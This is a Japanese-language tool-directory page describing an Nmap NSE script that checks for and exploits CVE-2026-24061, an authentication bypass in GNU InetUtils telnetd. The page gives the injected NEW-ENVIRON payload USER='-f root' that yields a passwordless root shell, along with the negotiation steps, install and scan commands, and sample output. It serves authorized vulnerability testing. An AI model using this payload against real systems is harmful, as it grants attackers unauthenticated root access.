Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061-NSE — このスクリプトは、実際のtelnet -aクライアントセッションの正確なバイトシーケンスをミラーリングした完全なTelnetネゴシエーションを実行します。 | Kitploit
ツール/GitHubGitHub/hd0x01/cve-2026-24061-nse
脆弱性スキャナーエクスプロイトネットワークセキュリティペネトレーションテスト認証
GitHubhd0x01/cve-2026-24061-nse

CVE-2026-24061-NSE

このスクリプトは、実際のtelnet -aクライアントセッションの正確なバイトシーケンスをミラーリングした完全なTelnetネゴシエーションを実行します。

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-24061 — GNU InetUtils telnetd 認証バイパス

Nmap NSE 検出スクリプト

Nmap NSE CVE CVSSv3 License


概要

このNmap NSEスクリプトは、GNU InetUtils telnetd バージョン 1.9.3から2.7 における認証バイパス脆弱性 CVE-2026-24061 を検出します。

Telnetオプション交渉中に -f <username> の形式で細工された USER 環境変数を送信することで、認証されていない攻撃者は、指定したローカルユーザーの権限(root を含む)でシェルを取得できます — 。

パスワードを一切入力することなく

想定される用途: 許可されたペネトレーションテストおよび脆弱性評価のみ。
明示的な書面による許可なしにシステムに対してこのスクリプトを実行することは違法です。


脆弱性の詳細

フィールド値
CVE IDCVE-2026-24061
影響を受けるバージョンGNU InetUtils telnetd 1.9.3 – 2.7
CVSSv3スコア9.8 Critical
ベクターCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
タイプ認証バイパス (CWE-287)
公開日2026-01-01

仕組み

GNU InetUtils telnetd は、Telnet NEW-ENVIRON オプション(RFC 1572)を使用して、交渉フェーズ中にクライアントから環境変数を受け取ります。その後、login(1) プログラムがそれらの変数を使用して呼び出されます。

この脆弱性は、telnetd が USER 変数をサニタイズせずに直接 login に渡すために発生します。Linuxの login プログラムは、「事前認証済み、パスワードを確認しない」 を意味する -f <user> フラグを受け入れます。NEW-ENVIRONペイロードを介して USER="-f root" を注入することで、攻撃者は認証を完全にバイパスします。

root@kitploit:~
Client → Server:  IAC SB NEW-ENVIRON IS  VAR "USER"  VALUE "-f root"  IAC SE
Server response:  spawns login -f root  →  root shell, no password required

スクリプトの詳細

フィールド値
ファイル名telnet-vuln-cve-2026-24061.nse
カテゴリvuln, exploit, intrusive
ポートTCP/23 (telnet)
テスト環境Nmap 7.94 / 7.98, Windows & Linux

検出方法

このスクリプトは、実際の telnet -a クライアントセッションの正確なバイトシーケンスを再現した(Wiresharkキャプチャから再構築)完全なTelnet交渉 を実行します:

  1. サーバーの開始IACバーストを受信(DO TTYPE, DO TSPEED, DO ENVIRON, …)
  2. 完全なクライアント機能宣言で応答(WILL TTYPE, WILL LINEMODE, …)
  3. サブネゴシエーションラウンドを完了(SB TSPEED, SB ENVIRON, SB TTYPE)
  4. NEW-ENVIRON ISペイロードに細工した USER='-f <user>' を注入
  5. WILL ECHO / DO BINARY / WONT LINEMODE シーケンスを完了
    (重要 — これがないと、telnetdはPTYセットアップを完了できません)
  6. パスワードチャレンジなしでログインシェルプロンプトが送信されるかどうかを確認

結果ステータス:

ステータス意味
EXPLOITシェルプロンプトを受信 — バイパス確認済み
LIKELY_VULNENVペイロードが受け入れられ、パスワードプロンプトなし、ただしシェルプロンプトなし
NOT_VULNパスワードプロンプトが見られた、または交渉が完了しなかった

インストール

Linux

root@kitploit:~
# Nmapスクリプトディレクトリにコピー
sudo cp telnet-vuln-cve-2026-24061.nse /usr/share/nmap/scripts/

# スクリプトデータベースを更新
sudo nmap --script-updatedb

Windows

root@kitploit:~
# Nmapスクリプトディレクトリにコピー(必要に応じてパスを調整)
copy telnet-vuln-cve-2026-24061.nse "C:\Program Files (x86)\Nmap\scripts\"

# スクリプトデータベースを更新(管理者として実行)
nmap --script-updatedb

使用方法

基本スキャン(デフォルトユーザー: root)

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 <target>

別のユーザーを指定

root@kitploit:~
# 短縮形式
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args user=kali <target>

# 中間形式
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args telnet-user=kali <target>

# 完全修飾形式
nmap -p 23 --script telnet-vuln-cve-2026-24061 \
    --script-args telnet-vuln-cve-2026-24061.user=kali <target>

IPレンジをスキャン

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 192.168.1.0/24

詳細 / デバッグ出力

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 -v  <target>   # 詳細
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d  <target>   # デバッグ
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d2 <target>   # 完全な16進トレース

出力例

脆弱なホスト

root@kitploit:~
PORT   STATE SERVICE
23/tcp open  telnet
| telnet-vuln-cve-2026-24061:
|   VULNERABLE:
|   GNU InetUtils telnetd Authentication Bypass
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2026-24061
|     Risk factor: Critical  CVSSv3: 9.8
|     Description:
|       The telnetd service in GNU InetUtils (1.9.3 - 2.7) allows
|       authentication bypass via a crafted USER environment variable.
|       Sending '-f <user>' results in an unauthenticated login shell.
|     Extra information:
|       Authentication bypassed: shell prompt received after injecting
|       USER='-f root' -- no password challenge was presented.
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2026-24061
|       https://github.com/JayGLXR/CVE-2026-24061-POC
|_      https://github.com/SafeBreach-Labs/CVE-2026-24061

脆弱でないホスト

root@kitploit:~
PORT   STATE SERVICE
23/tcp open  telnet

(スクリプト出力なし — NOT_VULNは設計上サイレント、標準的なNmapの慣例)


スクリプト引数

引数エイリアスデフォルト説明
telnet-vuln-cve-2026-24061.usertelnet-user, userroot-f で注入するユーザー名

技術ノート

WONT LINEMODEが重要な理由

GNU InetUtils telnetd は、Linemode交渉(RFC 1184)を使用して端末I/Oモードを決定します。サーバーは交渉の初期に DO LINEMODE を送信し、クライアントは最初に WILL LINEMODE で応答します。ENVペイロード交換後、サーバーは WILL ECHO に続いて DO BINARY を送信します。この時点でクライアントはキャラクタ単位モードを示すために WONT LINEMODE で応答する必要があります — これによってのみ telnetd はPTYセットアップ(ioctl TIOCSWINSZ)を完了し、login をフォークできます。このステップがないと、サーバーは peer died: Inappropriate ioctl for device をログに記録し、接続を切断します。

NSEソケットAPI

NmapのNSEソケットAPIは、標準のLuaソケット規約とは異なります:

root@kitploit:~
-- Nmap NSE (正しい):
local status, data = sock:receive_bytes(1)
if status == true then -- data is the received string

参考情報

  • NVD — CVE-2026-24061
  • JayGLXRによるPoC
  • SafeBreach-LabsによるPoC
  • RFC 1572 — NEW-ENVIRON
  • RFC 1184 — Linemode
  • Nmap NSEドキュメント

免責事項

このスクリプトは、許可されたセキュリティテストおよび研究目的のみ で提供されます。 作者は、このツールの誤用またはそれによって引き起こされた損害について責任を負いません。 所有していないシステムをテストする前に、必ず明示的な書面による許可を取得してください。

ツールをダウンロード